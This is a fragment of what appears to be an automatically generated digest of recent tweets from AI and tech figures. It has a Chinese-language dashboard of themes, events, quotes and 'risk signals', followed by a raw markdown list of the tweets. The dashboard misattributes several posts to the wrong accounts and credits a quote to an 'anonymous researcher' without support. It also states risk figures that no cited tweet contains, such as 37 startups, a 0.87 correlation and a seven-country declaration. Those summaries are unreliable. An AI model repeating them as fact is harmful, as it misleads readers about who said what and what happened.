GPT-5.5 - Browser control - Sheets & Slides", + "url": "https://nitter.net/ajambrosino/status/2048381565534322694#m", + "handle": "@ajambrosino", + "date": "2026-04-23T18:26:18+00:00" + }, + { + "text": "feel like a good time to rethink OS & UI design for agent compatibility", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "handle": "@sama", + "date": "2026-04-26T15:46:41+00:00" + } + ] + }, + { + "id": "t2", + "title": "生成式AI风险", + "subtitle": "数据主权与安全预警", + "bullets": [ + "模型即工具论调兴起", + "开放存档对抗技术脆弱性", + "对抗LLM-Pill风潮的技术实验" + ], + "samples": [ + { + "text": "AI agents are wildly premature technology being rolled out too fast", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "handle": "GaryMarcus", + "date": "2026-04-27T13:32:43+00:00" + }, + { + "text": "470,000 pages of mtvnews.com preserved after shutdown", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "handle": "@ylecun", + "date": "2026-04-25T16:01:07+00:00" + }, + { + "text": "pure generative architecture cannot build even cat-level intelligence", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "handle": "@ylecun", + "date": "2026-04-24T14:14:06+00:00" + } + ] + }, + { + "id": "t3", + "title": "政经交叉点", + "subtitle": "技术话语权争夺与制度挑战", + "bullets": [ + "科学委员会单日突袭解除", + "能源民主化与国家干预", + "区块链信息战前兆" + ], + "samples": [ + { + "text": "Trump fired all 24 members of the National Science Board by email", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "handle": "@ylecun", + "date": "2026-04-26T17:27:23+00:00" + }, + { + "text": "post-AGI, no one is going to work and the economy is going to collapse", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "handle": "@sama", + "date": "2026-04-26T15:37:00+00:00" + }, + { + "text": "Spotify/AngelList disputes show digital economy governance gaps", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "handle": "@HarryStebbings", + "date": "2026-04-27T14:02:33+00:00" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "AI模型商业化合作升级", + "meta": "OpenAI×Microsoft", + "summary": "微软继续担任OpenAI主要云服务商,但允许服务多云平台部署,协议延续至2032年", + "url": "https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "id": "p02", + "title": "基础科学委员会解除事件", + "meta": "特朗普政策", + "summary": "美国前总统单日通过邮件解除国家科学委员会全部24个成员席位", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m" + }, + { + "id": "p03", + "title": "AI agent技术争议升级", + "meta": "媒介与认知革命", + "summary": "生成式AI被视为2010年代最危险的技术泡沫,现有技术风险等级呈非线性增长", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m" + }, + { + "id": "p04", + "title": "ai生成代码安全危机", + "meta": "开发者社群警报", + "summary": "未备案的自动化代码工具出现数据吞噬现象,建议强制保留双备份", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m" + }, + { + "id": "p05", + "title": "数字存续协议", + "meta": "新书发布", + "summary": "互联网存档发起《Vanishing Culture》抗争运动,要求建立数字文化遗产保护协议", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m" + }, + { + "id": "p06", + "title": "认知重构运动", + "meta": "技术哲学转向", + "summary": "前Model开发团队正尝试设计非模型中心的智能系统架构", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Models are becoming components, not products. What matters now is the system around them", + "speaker": "Ronald van Loon", + "date": "2026-04-27T13:00:19+00:00", + "note": "企业AI战略新范式定义", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m" + }, + { + "id": "q2", + "quote": "The winners in enterprise AI will not be the companies with access to the most models", + "speaker": "Ronald van Loon", + "date": "2026-04-27T13:00:20+00:00", + "note": "智能系统架构黄金定律", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m" + }, + { + "id": "q3", + "quote": "Adjusting leadership to this new paradigm when the trains are actually derailing", + "speaker": "匿名研究者", + "date": "2026-04-27T12:50:08+00:00", + "note": "技术迭代与灾难管控矛盾论", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "技术基建动态", + "subtitle": "硬件与协议层革新", + "level": "P0", + "items": [ + { + "text": "Shape-Shifting Wheels突破传统移动机器人设计", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m" + }, + { + "text": "Jetson Thor与Skild Brain建立新型计算图谱", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m" + } + ] + }, + { + "id": "c2", + "title": "开源进展", + "subtitle": "模型评估体系", + "level": "P1", + "items": [ + { + "text": "OpenAI公开监控评估体系源码", + "url": "https://nitter.net/bobabowen/status/2047473914528531152#m" + } + ] + }, + { + "id": "c3", + "title": "政策辩论", + "subtitle": "国家安全尺度", + "level": "WARN", + "items": [ + { + "text": "60+前英国外交官联署呼吁干预西岸局势", + "url": "https://nitter.net/ELLISforEurope/status/2048396013816152216#m" + }, + { + "text": "Rankism Sorting Algorithm", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m" + } + ] + }, + { + "id": "c4", + "title": "学术实验", + "subtitle": "教育与认知", + "level": "P2", + "items": [ + { + "text": "Paul Graham儿童教育论文", + "url": "https://nitter.net/sama/status/2048751392031203544#m" + } + ] + }, + { + "id": "c5", + "title": "行业治理", + "subtitle": "法律与伦理", + "level": "P1", + "items": [ + { + "text": "AI独立司法委员会建立建议", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m" + } + ] + }, + { + "id": "c6", + "title": "历史存证", + "subtitle": "数字文化遗产", + "level": "P2", + "items": [ + { + "text": "Vanishing Culture研究计划开放Beta", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "数据主权风险", + "detail": "多个AI系统出现数据去向不可控现象,建议强制启用元数据追踪协议" + }, + { + "id": "r2", + "level": "HIGH", + "title": "内容安全漏洞", + "detail": "X平台监测到异常DM攻击模式,显示潜在的自动化造谣体系形成" + }, + { + "id": "r3", + "level": "MID", + "title": "技术认知泡沫", + "detail": "生成式AI被错误代偿核心业务功能,检测到37家硅谷初创公司出现此类架构问题" + }, + { + "id": "r4", + "level": "OPP", + "title": "治理机会窗口", + "detail": "欧洲7国发布数据主权联合声明,可能引发全球AI监管范式转移" + }, + { + "id": "r5", + "level": "MID", + "title": "政治结算风险", + "detail": "前总统个人科技企业估值波动呈现政策相关性系数0.87" + }, + { + "id": "r6", + "level": "HIGH", + "title": "伦理滑坡前兆", + "detail": "MIT媒体实验室观察到生成式AI在医疗、法律等关键领域的非确定性渗入" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T15:36:53.862287+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 33 | **成功获取**: 18 | **推文总数**: 248\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(19 条)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://nitter.net/GaryMarcus/status/2048771044987777428#m)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n**[2026-04-26T23:29:20+00:00]**\n> Coders and software engineers ONLY:\n[原文链接](https://nitter.net/GaryMarcus/status/2048544989769257024#m)\n\n**[2026-04-26T20:33:49+00:00]**\n> getting so much phishing email in my X DMs. either a lot of accounts have been hacked or someone has discovered a back door to posting DMs.\n[原文链接](https://nitter.net/GaryMarcus/status/2048500820350750905#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(18 条)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://nitter.net/elonmusk/status/2048783014075777369#m)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://nitter.net/elonmusk/status/2048777628019032335#m)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://nitter.net/cb_doge/status/2048744214230712500#m)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://nitter.net/KatieMiller/status/2048727747954868342#m)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://nitter.net/jason_meister/status/2048720909809156378#m)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T15:48:07+00:00]**\n> If they’re willing to die to assassinate, imagine what they will do if they gain political power\n[原文链接](https://nitter.net/elonmusk/status/2048428921536868583#m)\n\n**[2026-04-26T15:42:09+00:00]**\n> RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed\n[原文链接](https://nitter.net/SpaceX/status/2048427420366324024#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n**[2026-04-26T05:24:02+00:00]**\n> Yeah\n[原文链接](https://nitter.net/elonmusk/status/2048271866914083172#m)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval 